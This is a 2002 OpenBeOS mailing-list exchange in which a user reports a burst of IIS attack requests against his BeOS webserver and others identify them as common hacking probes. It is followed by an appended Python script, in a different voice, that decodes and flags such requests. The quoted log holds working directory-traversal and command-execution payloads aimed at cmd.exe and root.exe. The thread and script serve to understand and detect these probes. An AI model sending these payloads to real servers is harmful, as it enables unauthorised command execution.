[openbeos] Re: I think someone tried to hack into my machine

  • From: "Matt Verran" <matt@xxxxxxxxxxxxxxxxxxx>
  • To: openbeos@xxxxxxxxxxxxx
  • Date: Fri, 22 Mar 2002 02:50:45 GMT

Looks like Back Orifice,,,,,

Of course BeOS isn't vulnerable to that kind of cow poo!


> I run a personal web-server using RobinHood (Road-Runner Cable 
> Modem), I get
> this all the time!!! 
> 
> They are very standard methods of hacking IIS. 
> 
> Gary Thom
> 
> -----Original Message-----
> From: Daniel Reinhold [mailto:danielr@xxxxxxxxxxxxx]
> Sent: 19 March, 2002 2:49 AM
> To: Public OBOS mailing list
> Subject: [openbeos] I think someone tried to hack into my machine
> 
> Ok, this was rather interesting. It happened just about fifteen 
> minutes
> ago (as I'm writing this).
> 
> I'm online (PPP dialup) and am also running a local webserver (i.e.
> sending requests to loopback address 127.0.0.1). Yeah, that's asking
> for trouble, at least theoretically. That is, someone on the 
> internet,
> if they happened to get a hold of my (temporary, dynamically 
> assigned)
> IP, could send requests for local files and have them sent back out
> across the network. I've never had anything weird happen before, so
> I've always been pretty blase about the security risk.
> 
> Anyway, I'm just testing some news items locally before copying them
> over to the OpenBeOS website (which is my usual MO). Suddenly, I 
> notice
> the Terminal window (largely covered by another window, but partially
> showing) has a flurry of text flying by and the DUN replicant in the
> Deskbar shows lots of bytes transmitting back and forth. Wtf? So I
> uncover the Terminal window (which is running the webserver) and see
> that a number of unusual requests have just been attended to. Here's
> the first one:
> 
> GET /scripts/root.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
> 
> The remaining requests all look like that but with different URLs. 
> Here
> are the other URLs that were requested:
> 
> GET /MSADC/root.exe?/c+dir HTTP/1.0
> GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> 
> To me, that looks all the world like some hacker trying to grab files
> from my local machine. Could there be another explanation?
> 
> Of course, I'm running BeOS (and don't have NT) so my local webserver
> just returned a bunch of 404 (Not found) responses. Still, makes you
> wonder.
> 
> Has anyone else on this list had any similar experiences? What do you
> make of this?
> 
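The request lines quoted above only work against a server that decodes %255c (double-encoded backslash) and malformed pairs such as %c1%1c or %c0%2f into path separators before checking the path. As an added example (my own code, not anything posted in this thread), here is a small Python checker that canonicalises request paths the way such a lenient decoder would, resolves the resulting `..` traversal, and flags requests that end up pointing at cmd.exe or root.exe; the sample log lines are constructed from the probes quoted in the post, with one benign request added.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample log: request lines of the kind quoted in the thread plus one benign request.
SAMPLE_REQUESTS = [
    "GET /scripts/root.exe?/c+dir HTTP/1.0",
    "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /news/index.html HTTP/1.0",
]
# A 0xC0/0xC1 lead byte followed by any byte: the malformed two-byte pairs these probes use.
LENIENT_2BYTE = re.compile(rb"[\xc0\xc1](.)", re.S)
# Command interpreters that must never be reachable below a web server's document root.
COMMAND_TARGETS = re.compile(r"/(?:winnt/system32/cmd\.exe|root\.exe)$", re.I)

def canonical_path(path: str) -> str:
    """Decode like a lenient server: percent-decode twice (%255c -> %5c -> '\\'),
    fold a C0/C1 pair into ((lead & 0x1F) << 6) | (trail & 0x3F), treat '\\' as '/'."""
    raw = path.encode("latin-1")
    for _ in range(2):
        raw = unquote_to_bytes(raw)
    raw = LENIENT_2BYTE.sub(
        lambda m: bytes([((m.group(0)[0] & 0x1F) << 6) | (m.group(1)[0] & 0x3F)]), raw)
    return raw.decode("latin-1").replace("\\", "/")

def resolve(canon: str) -> str:
    """Collapse '.' and '..' segments so the path shows where the request really points."""
    parts = []
    for seg in canon.split("/"):
        if seg == "..":
            if parts:
                parts.pop()
        elif seg and seg != ".":
            parts.append(seg)
    return "/" + "/".join(parts)

def classify(request_line: str) -> dict:
    """Return the decoded target and whether the line looks like a traversal/command probe."""
    _method, target, _version = request_line.split(" ", 2)
    path = target.partition("?")[0]
    canon = canonical_path(path)
    resolved = resolve(canon)
    return {"raw": path, "resolved": resolved,
            "traversal": ".." in canon.split("/"),
            "suspicious": bool(COMMAND_TARGETS.search(resolved))}

def scan(lines):
    """Classify every request line and keep only those flagged as suspicious."""
    return [r for r in map(classify, lines) if r["suspicious"]]
```

Run `scan(SAMPLE_REQUESTS)` on the sample: four of the five lines are flagged, and every flagged traversal resolves to `/winnt/system32/cmd.exe`, which is the signal a log monitor should alert on regardless of whether the local server returned 404.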


